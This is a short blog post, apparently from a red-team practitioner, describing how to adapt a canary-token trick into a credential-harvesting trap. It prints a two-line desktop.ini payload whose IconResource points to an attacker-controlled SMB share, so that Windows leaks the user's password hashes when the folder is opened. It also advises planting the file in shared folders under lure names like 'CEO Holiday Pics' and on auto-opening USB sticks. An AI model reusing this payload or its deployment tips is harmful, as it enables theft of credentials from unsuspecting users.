Malware Not Needed?

2018-12-23T01:14:21+00:00December 17 2018|

Recently had a *duh* moment while playing with the ‘opened folder’ canary technique used by http://canarytokens.org/ – a Thinkst* project

One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to it’s users, this happens by checking for a ==hidden== desktop.ini file that will point the OS to folder view preferences.

Canary works by directing the preferences to a remote server, when that request comes in, we know the folder has been entered… very sneaky! ( I didn’t know about this technique until I was exploring the canarytokens.org available payloads – check them out https://canarytokens.org/generate

So I figured, if we point it to a remote location with SMB authentication on it, we know that windows will automatically send it’s current user’s credentials to the location, I’ll get hashes!

[.ShellClassInfo]
IconResource=\\IP_or_domain_you_control\resource.dll

If you are ever on a RedTeam and you have access to a shared folder plant one in there will need to make a share read-only for the desktop.ini to persist with a name like PeopleGettingSacked or Movies or CEO Holiday Pics … whatever, you know better than me…

Additionally, if you put the desktop.ini flat on a USB stick as soon as the pen is mounted (unless auto-run is disabled, it will open up the folder automatically (actioning the attack)

I bet this is already being used out there ! … very sneaky/powerful, I had to share … in fact, I can’t help thinking this might be a very well known thing and I’m out of the loop -_-

I think there is some caching of the desktop.ini too (at least with Windows 10, as when I ejected my evil USB I could still see incoming requests from my machine. – will follow up with that.


An in-depth look into options when writing a desktop.ini file, possibly more opportunities for trouble? https://hwiegman.home.xs4all.nl/desktopini.html

Attacker & User view : https://www.youtube.com/watch?v=t8zqJm5d8gg